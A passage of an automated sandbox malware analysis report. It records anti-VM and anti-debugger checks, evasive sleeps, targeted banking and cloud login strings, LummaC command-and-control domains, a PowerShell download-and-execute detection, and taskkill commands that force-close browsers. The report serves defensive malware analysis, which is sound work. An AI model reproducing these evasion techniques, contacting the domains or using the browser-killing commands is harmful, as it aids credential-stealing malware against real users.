Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Memory allocated: 5110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Memory allocated: 7110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Memory allocated: 54B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Memory allocated: 56F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Memory allocated: 5540000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Code function: 3_2_05670CB4 rdtsc 3_2_05670CB4
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 7442 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1235 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Window / User API: threadDelayed 558
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 6532 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe TID: 7468 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7608 Thread sleep count: 59 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7608 Thread sleep time: -118059s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7612 Thread sleep count: 72 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7612 Thread sleep time: -144072s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7596 Thread sleep count: 7442 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7596 Thread sleep time: -14891442s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7616 Thread sleep count: 67 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7616 Thread sleep time: -134067s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7584 Thread sleep count: 295 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7584 Thread sleep time: -8850000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7708 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7620 Thread sleep count: 54 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7620 Thread sleep time: -108054s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7600 Thread sleep count: 51 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7600 Thread sleep time: -102051s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7596 Thread sleep count: 1235 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7596 Thread sleep time: -2471235s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe TID: 7956 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe TID: 6268 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe TID: 7300 Thread sleep time: -114000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe TID: 6948 Thread sleep count: 80 > 30
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe TID: 6948 Thread sleep time: -480000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe TID: 2644 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe TID: 8108 Thread sleep time: -72000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Thread delayed: delay time: 922337203685477
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: skotes.exe, skotes.exe, 00000006.00000002.2499298173.00000000005FA000.00000040.00000001.01000000.0000000A.sdmp, 6BWDEAM9H4119O8P9KYSM4M710Q.exe, 6BWDEAM9H4119O8P9KYSM4M710Q.exe, 00000007.00000002.2594084718.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.3438603582.00000000005FA000.00000040.00000001.01000000.0000000A.sdmp, 36c3130eac.exe, 0000000D.00000002.2998474440.00000000012FE000.00000040.00000001.01000000.00000010.sdmp, ee8d47a049.exe, 0000000E.00000002.3049348656.00000000008F8000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 0000000A.00000002.3448009967.000000000119B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWXY
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000003.2199665798.000000000064F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199555514.0000000000631000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199555514.000000000064D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208378374.0000000000631000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208378374.000000000064D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208508823.000000000064F000.00000004.00000020.00020000.00000000.sdmp, PJGT15Z82T6C2GQS.exe, 00000004.00000002.2518168701.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, PJGT15Z82T6C2GQS.exe, 00000004.00000002.2518168701.0000000001115000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000A.00000002.3448009967.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000A.00000002.3448009967.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2884028726.00000000010C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: ee8d47a049.exe, 0000000C.00000003.2912826381.0000000005853000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: firefox.exe, 0000001C.00000002.3206999260.000002681FE7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 36c3130eac.exe, 0000000D.00000002.2997022588.000000000072E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: A94C1J5VAPFWM1J1FS.exe, 00000003.00000002.2439557696.0000000000EBA000.00000040.00000001.01000000.00000006.sdmp, PJGT15Z82T6C2GQS.exe, 00000004.00000002.2517010047.000000000088E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2498618197.00000000005FA000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000006.00000002.2499298173.00000000005FA000.00000040.00000001.01000000.0000000A.sdmp, 6BWDEAM9H4119O8P9KYSM4M710Q.exe, 00000007.00000002.2594084718.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.3438603582.00000000005FA000.00000040.00000001.01000000.0000000A.sdmp, 36c3130eac.exe, 0000000D.00000002.2998474440.00000000012FE000.00000040.00000001.01000000.00000010.sdmp, ee8d47a049.exe, 0000000E.00000002.3049348656.00000000008F8000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: ee8d47a049.exe, 0000000C.00000003.2912980649.0000000005846000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Code function: 3_2_05670CB4 rdtsc 3_2_05670CB4
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Code function: 7_2_0093B7A6 LdrInitializeThunk, 7_2_0093B7A6
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: PJGT15Z82T6C2GQS.exe PID: 2988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 36c3130eac.exe PID: 8068, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
LummaC encrypted strings found
Source: file.exe, 00000000.00000003.2179806804.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: clearancek.site
Source: file.exe, 00000000.00000003.2179806804.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: licendfilteo.site
Source: file.exe, 00000000.00000003.2179806804.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: spirittunek.store
Source: file.exe, 00000000.00000003.2179806804.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bathdoomgaz.store
Source: file.exe, 00000000.00000003.2179806804.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: studennotediw.store
Source: file.exe, 00000000.00000003.2179806804.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: dissapoiznw.store
Source: file.exe, 00000000.00000003.2179806804.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: eaglepawnoy.store
Source: file.exe, 00000000.00000003.2179806804.0000000004750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mobbipenju.store
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe "C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe "C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe "C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001141001\num.exe "C:\Users\user\AppData\Local\Temp\1001141001\num.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
